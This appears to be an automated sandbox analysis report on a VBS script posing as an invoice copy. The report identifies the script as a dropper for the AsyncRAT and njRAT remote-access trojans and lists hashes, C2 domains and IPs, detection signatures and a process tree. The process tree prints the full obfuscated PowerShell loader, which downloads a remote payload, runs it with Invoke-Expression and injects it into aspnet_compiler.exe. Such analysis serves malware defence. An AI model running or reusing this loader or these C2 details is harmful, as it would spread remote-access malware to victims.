Analysis
-
max time kernel
146s -
max time network
150s -
platform
windows10_x64 -
resource
win10-en -
submitted
13-09-2021 20:36
Static task
static1
Behavioral task
behavioral1
Sample
V00GH01_Invoice_Copy.vbs
Resource
win7v20210408
General
-
Target
V00GH01_Invoice_Copy.vbs
-
Size
3KB
-
MD5
f0eb4b843b026d5d100f69d47c2f576e
-
SHA1
f29356a70659a502ef8eea82fef2cc05e92d80fd
-
SHA256
c083348abc25e7c20eed06e9ceddd94af7b4787ea22dbca312d4b9e8504cf882
-
SHA512
57165f90091e183b248dc0cb8f7a8ca8dffa68818b4bbc045e7128ed13326c71e94de1111daefcd6875438afe3b2b765d51195ea1e3a0f8e986c74956f00c801
Malware Config
Extracted
http://52.188.147.221/All%20in%20One/fj.txt
Extracted
asyncrat
0.5.7B
Default
jilldoggyy.duckdns.org:7840
jilldoggyy.duckdns.org:7829
jilldoggyy.duckdns.org:7841
103.147.185.192:7840
103.147.185.192:7829
103.147.185.192:7841
AsyncMutex_6SI8OkPnk
-
anti_vm
false
-
bsod
false
-
delay
3
-
install
false
-
install_folder
%AppData%
-
pastebin_config
null
Extracted
njrat
v4.0
HacKed
20.194.35.6:8023
Windows
-
reg_key
Windows
-
splitter
|-F-|
Signatures
-
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/5096-156-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral2/memory/5096-157-0x000000000040C77E-mapping.dmp asyncrat -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 4780 powershell.exe 8 4780 powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exedescription pid process target process PID 4780 set thread context of 5096 4780 powershell.exe aspnet_compiler.exe PID 4780 set thread context of 4152 4780 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 4780 powershell.exe 4780 powershell.exe 4780 powershell.exe -
Suspicious use of AdjustPrivilegeToken 31 IoCs
Processes:
powershell.exeaspnet_compiler.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 4780 powershell.exe Token: SeDebugPrivilege 5096 aspnet_compiler.exe Token: SeDebugPrivilege 4152 aspnet_compiler.exe Token: 33 4152 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4152 aspnet_compiler.exe Token: 33 4152 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4152 aspnet_compiler.exe Token: 33 4152 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4152 aspnet_compiler.exe Token: 33 4152 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4152 aspnet_compiler.exe Token: 33 4152 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4152 aspnet_compiler.exe Token: 33 4152 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4152 aspnet_compiler.exe Token: 33 4152 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4152 aspnet_compiler.exe Token: 33 4152 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4152 aspnet_compiler.exe Token: 33 4152 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4152 aspnet_compiler.exe Token: 33 4152 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4152 aspnet_compiler.exe Token: 33 4152 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4152 aspnet_compiler.exe Token: 33 4152 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4152 aspnet_compiler.exe Token: 33 4152 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4152 aspnet_compiler.exe Token: 33 4152 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4152 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 4732 wrote to memory of 4780 4732 WScript.exe powershell.exe PID 4732 wrote to memory of 4780 4732 WScript.exe powershell.exe PID 4780 wrote to memory of 5096 4780 powershell.exe aspnet_compiler.exe PID 4780 wrote to memory of 5096 4780 powershell.exe aspnet_compiler.exe PID 4780 wrote to memory of 5096 4780 powershell.exe aspnet_compiler.exe PID 4780 wrote to memory of 5096 4780 powershell.exe aspnet_compiler.exe PID 4780 wrote to memory of 5096 4780 powershell.exe aspnet_compiler.exe PID 4780 wrote to memory of 5096 4780 powershell.exe aspnet_compiler.exe PID 4780 wrote to memory of 5096 4780 powershell.exe aspnet_compiler.exe PID 4780 wrote to memory of 5096 4780 powershell.exe aspnet_compiler.exe PID 4780 wrote to memory of 4152 4780 powershell.exe aspnet_compiler.exe PID 4780 wrote to memory of 4152 4780 powershell.exe aspnet_compiler.exe PID 4780 wrote to memory of 4152 4780 powershell.exe aspnet_compiler.exe PID 4780 wrote to memory of 4152 4780 powershell.exe aspnet_compiler.exe PID 4780 wrote to memory of 4152 4780 powershell.exe aspnet_compiler.exe PID 4780 wrote to memory of 4152 4780 powershell.exe aspnet_compiler.exe PID 4780 wrote to memory of 4152 4780 powershell.exe aspnet_compiler.exe PID 4780 wrote to memory of 4152 4780 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\V00GH01_Invoice_Copy.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'http://52H-H188H-H147H-H221/All%20in%20One/fjH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split '-X-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/4152-161-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/4152-174-0x0000000005440000-0x0000000005441000-memory.dmpFilesize
4KB
-
memory/4152-173-0x00000000054B0000-0x00000000054B1000-memory.dmpFilesize
4KB
-
memory/4152-172-0x00000000054A0000-0x00000000054A1000-memory.dmpFilesize
4KB
-
memory/4152-167-0x00000000059B0000-0x00000000059B1000-memory.dmpFilesize
4KB
-
memory/4152-166-0x0000000004E30000-0x0000000004E31000-memory.dmpFilesize
4KB
-
memory/4152-162-0x000000000040836E-mapping.dmp
-
memory/4780-126-0x000001B6FE9E0000-0x000001B6FE9E1000-memory.dmpFilesize
4KB
-
memory/4780-155-0x000001B6FD990000-0x000001B6FD994000-memory.dmpFilesize
16KB
-
memory/4780-144-0x000001B6FDDB8000-0x000001B6FDDB9000-memory.dmpFilesize
4KB
-
memory/4780-133-0x000001B6FDDB6000-0x000001B6FDDB8000-memory.dmpFilesize
8KB
-
memory/4780-115-0x0000000000000000-mapping.dmp
-
memory/4780-125-0x000001B6FDDB3000-0x000001B6FDDB5000-memory.dmpFilesize
8KB
-
memory/4780-124-0x000001B6FDDB0000-0x000001B6FDDB2000-memory.dmpFilesize
8KB
-
memory/4780-120-0x000001B6FDD60000-0x000001B6FDD61000-memory.dmpFilesize
4KB
-
memory/5096-156-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/5096-157-0x000000000040C77E-mapping.dmp
-
memory/5096-168-0x00000000058D0000-0x00000000058D1000-memory.dmpFilesize
4KB
-
memory/5096-171-0x0000000005ED0000-0x0000000005ED1000-memory.dmpFilesize
4KB